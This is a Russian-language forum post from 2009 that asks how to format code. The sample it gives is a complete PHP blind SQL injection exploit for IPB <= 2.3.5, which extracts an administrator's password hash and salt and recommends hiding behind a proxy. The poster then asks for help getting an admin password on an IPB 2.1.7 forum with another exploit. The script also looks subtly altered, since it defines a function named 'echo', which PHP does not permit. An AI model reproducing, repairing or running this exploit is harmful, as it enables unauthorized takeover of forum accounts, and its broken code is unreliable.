Как грамотно вставлять код в пост?

Discussion in 'Песочница' started by Менеджер, 15 May 2009.

  1. Менеджер

    Менеджер New Member

    Joined:
    16 Apr 2009
    Messages:
    0
    Likes Received:
    0
    Reputations:
    0
    Пример:

    <?php
    error_reporting(E_ALL);
    ///////////////////////////////////////////////////////////////////////
    ///////////////////////////////////////////////////////////////////////
    // IPB <= 2.3.5 sql injection exploit
    // Version 1.0
    // written by Janek Vind "waraxe"
    // Estonia, Tartu
    // http://www.waraxe.us/
    // 20. september 2008
    // based on DarkFig's advisory
    // http://acid-root.new.fr/?0:18
    //
    // FEATURES:
    // 1. Fetching algorithm optimized for speed
    // 2. Attack goes through $_POST, so no suspicious logs
    // 3. Pretesting saves time if IPB is not vulnerable
    //
    // More useful tools: http://www.waraxe.us/tools/
    // Waraxe forums: http://www.waraxe.us/forums.html
    //
    // NB! This exploit is meant to be run as php CLI!
    // http://www.php.net/features.commandline
    ///////////////////////////////////////////////////////////////////////
    ///////////////////////////////////////////////////////////////////////
    //=====================================================================
    $url = 'http://localhost/ipb.2.3.5/';
    $id = 1;// ID of the target user, default value "1" is admin's ID
    $prefix = 'ibf_';// IPB table prefix, default is "ibf_"
    # Proxy settings
    # Be sure to use proxy :)
    //$proxy_ip_port = '127.0.0.1:8118';
    //$proxy_user_password = 'someuser:somepassword';
    $outfile = './ipblog.txt';// Log file
    //======================================================================
    ///////////////////////////////////////////////////////////////////////
    // Don't mess below this line, unless you know the stuff ;)
    ///////////////////////////////////////////////////////////////////////
    //=====================================================================
    ///////////////////////////////////////////////////////////////////////
    $cli = php_sapi_name() === 'cli';
    //=====================================================================
    // Warning, if executed from webserver
    //=====================================================================
    if(!$cli)
    {
    if(!isset($_REQUEST['wtf-is-cli']))
    {
    echo "<html><head><title>Attention!</title></head>\n";
    echo "<body><br /><br /><center>\n";
    echo "<h1>Warning!</h1>\n";
    echo "This exploit is meant to be used as php CLI script!<br />\n";
    echo "More information:<br />\n";
    echo "<a href=\"http://www.google.com/search?hl=en&q=php+cli+windows\" target=\"_blank\">http://www.google.com/search?hl=en&q=php+cli+windows</a><br />\n";
    echo "Still, you can try to run it from webserver.<br />\n";
    echo "Just press the button below and prepare for long waiting<br />\n";
    echo "And learn to use php CLI next time, please ...<br />\n";
    echo "<form method=\"get\">\n";
    echo "<input type=\"submit\" name=\"wtf-is-cli\" value=\"Let me in, i don't care\">\n";
    echo "</form>\n";
    echo "</center></body></html>\n";
    exit;
    }
    else
    {
    // Let's try to maximize our chances without CLI
    @set_time_limit(0);
    }
    }
    //=====================================================================
    echo("Target: $url\n");
    echo("Sql table prefix: $prefix\n");
    echo("Testing target URL ... \n");
    test_target_url();
    echo("Target URL seems to be valid\n");
    echo("Testing target ID ... \n");
    test_target_id();
    echo("Target ID seems to be valid\n");

    $hash = get_hash();
    $salt = get_salt();

    add_line("Target: $url");
    add_line("User ID: $id");
    add_line("Hash: $hash");
    add_line("Salt: $salt");
    add_line("------------------------------------------");

    echo("\n------------------------------------------\n");
    echo("Hash: $hash\n");
    echo("Salt: $salt");
    echo("\n------------------------------------------\n");

    echo("\nQuestions and feedback - http://www.waraxe.us/ \n");
    die("See ya! :) \n");
    //////////////////////////////////////////////////////////////////////
    //////////////////////////////////////////////////////////////////////
    function test_target_url()
    {
    global $url;

    $post = 'act=xmlout&do=check-display-name&name=somethingfoobarkind%2527 OR 1=1-- ';
    $buff = trim(make_post($url, $post, '', $url));
    if($buff !== 'found')
    {
    die('Invalid response, target URL not valid? Exiting ...');
    }
    }
    //////////////////////////////////////////////////////////////////////
    function test_target_id()
    {
    global $url, $prefix, $id;

    $post = 'UNION SELECT 1,1 FROM ' . $prefix . 'members_converge WHERE converge_id=' . $id . ' AND LENGTH(converge_pass_hash)=32';
    if(!test_condition($post))
    {
    die('Invalid response, target ID not valid? Exiting ...');
    }
    }
    ///////////////////////////////////////////////////////////////////////
    function get_salt()
    {
    $len = 5;
    $out = '';

    echo("Finding salt ...\n");

    for($i = 1; $i < $len + 1; $i ++)
    {
    $ch = get_saltchar($i);
    echo("Got pos $i --> $ch\n");
    $out .= "$ch";
    echo("Current salt: $out \n");
    }

    echo("\nFinal salt: $out\n\n");

    return $out;
    }
    ///////////////////////////////////////////////////////////////////////
    function get_saltchar($pos)
    {
    global $prefix, $id;

    $char = '';
    $min = 32;
    $max = 128;
    $pattern = 'UNION SELECT 1,1 FROM ' . $prefix . "members_converge WHERE converge_id=$id AND ORD(SUBSTR(converge_pass_salt,$pos,1))";
    $curr = 0;

    while(1)
    {
    $area = $max - $min;
    if($area < 2 )
    {
    $post = $pattern . "=$max";
    $eq = test_condition($post);

    if($eq)
    {
    $char = chr($max);
    }
    else
    {
    $char = chr($min);
    }

    break;
    }

    $half = intval(floor($area / 2));
    $curr = $min + $half;

    $post = $pattern . '%253e' . $curr;

    $bigger = test_condition($post);

    if($bigger)
    {
    $min = $curr;
    }
    else
    {
    $max = $curr;
    }

    echo("Current test: $curr-$max-$min\n");
    }

    return $char;
    }
    ///////////////////////////////////////////////////////////////////////
    function get_hash()
    {
    $len = 32;
    $out = '';

    echo("Finding hash ...\n");

    for($i = 1; $i < $len + 1; $i ++)
    {
    $ch = get_hashchar($i);
    echo("Got pos $i --> $ch\n");
    $out .= "$ch";
    echo("Current hash: $out \n");
    }

    echo("\nFinal hash: $out\n\n");

    return $out;
    }
    ///////////////////////////////////////////////////////////////////////
    function get_hashchar($pos)
    {
    global $prefix, $id;

    $char = '';
    $pattern = 'UNION SELECT 1,1 FROM ' . $prefix . "members_converge WHERE converge_id=$id AND ORD(SUBSTR(converge_pass_hash,$pos,1))";

    // First let's determine, if it's number or letter
    $post = $pattern . '%253e57';
    $letter = test_condition($post);

    if($letter)
    {
    $min = 97;
    $max = 102;
    echo("Char to find is [a-f]\n");
    }
    else
    {
    $min = 48;
    $max = 57;
    echo("Char to find is [0-9]\n");
    }

    $curr = 0;

    while(1)
    {
    $area = $max - $min;
    if($area < 2 )
    {
    $post = $pattern . "=$max";
    $eq = test_condition($post);

    if($eq)
    {
    $char = chr($max);
    }
    else
    {
    $char = chr($min);
    }

    break;
    }

    $half = intval(floor($area / 2));
    $curr = $min + $half;

    $post = $pattern . '%253e' . $curr;

    $bigger = test_condition($post);

    if($bigger)
    {
    $min = $curr;
    }
    else
    {
    $max = $curr;
    }

    echo("Current test: $curr-$max-$min\n");
    }

    return $char;
    }
    ///////////////////////////////////////////////////////////////////////
    function test_condition($p)
    {
    global $url;

    $bret = false;
    $maxtry = 10;
    $try = 1;

    $pattern = 'act=xmlout&do=check-display-name&name=%%2527 OR 1=%%2522%%2527%%2522 %s OR 1=%%2522%%2527%%2522-- ';
    $post = sprintf($pattern, $p);

    while(1)
    {
    $buff = trim(make_post($url, $post, '', $url));

    if($buff === 'found')
    {
    $bret = true;
    break;
    }
    elseif($buff === 'notfound')
    {
    break;
    }
    elseif(strpos($buff, '<title>IPS Driver Error</title>') !== false)
    {
    die("Sql error! Wrong prefix?\nExiting ... ");
    }
    else
    {
    echo("test_condition() - try $try - invalid return value ...\n");
    $try ++;
    if($try > $maxtry)
    {
    die("Too many tries - exiting ...\n");
    }
    else
    {
    echo("Trying again - try $try ...\n");
    }
    }
    }

    return $bret;
    }
    ///////////////////////////////////////////////////////////////////////
    function make_post($url, $post_fields='', $cookie = '', $referer = '', $headers = FALSE)
    {
    $ch = curl_init();
    $timeout = 120;
    curl_setopt ($ch, CURLOPT_URL, $url);
    curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
    curl_setopt($ch, CURLOPT_POST, 1);
    curl_setopt($ch, CURLOPT_POSTFIELDS, $post_fields);
    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 0);
    curl_setopt ($ch, CURLOPT_USERAGENT, 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)');

    if(!empty($GLOBALS['proxy_ip_port']))
    {
    curl_setopt($ch, CURLOPT_PROXY, $GLOBALS['proxy_ip_port']);

    if(!empty($GLOBALS['proxy_user_password']))
    {
    curl_setopt($ch, CURLOPT_PROXYUSERPWD, $GLOBALS['proxy_user_password']);
    }
    }

    if(!empty($cookie))
    {
    curl_setopt ($ch, CURLOPT_COOKIE, $cookie);
    }

    if(!empty($referer))
    {
    curl_setopt ($ch, CURLOPT_REFERER, $referer);
    }

    if($headers === TRUE)
    {
    curl_setopt ($ch, CURLOPT_HEADER, TRUE);
    }
    else
    {
    curl_setopt ($ch, CURLOPT_HEADER, FALSE);
    }

    $fc = curl_exec($ch);
    curl_close($ch);

    return $fc;
    }
    ///////////////////////////////////////////////////////////////////////
    function add_line($line)
    {
    global $outfile;

    $line .= "\n";
    $fh = fopen($outfile, 'ab');
    fwrite($fh, $line);
    fclose($fh);

    }
    ///////////////////////////////////////////////////////////////////////
    function echo($line)
    {
    if($GLOBALS['cli'])
    {
    echo "$line";
    }
    else
    {
    $line = nl2br(htmlspecialchars($line));
    echo "$line";
    }
    }
    //////////////////////////////////////////////////////////////////////
    ?>

    Как сделать удобную форму для кода?
    Где может быть инструкция?

    По поводу кода:
    Попробовал этот эксплойт, но форум оказался пропатчен.

    Мне нужно получить пароль администратора на форуме IPB 2.1.7 - нашел другой эксплойт, поправил, но он не работает. Почему?
     
    #1 Менеджер, 15 May 2009
    Last edited: 15 May 2009
(You must log in or sign up to post here.)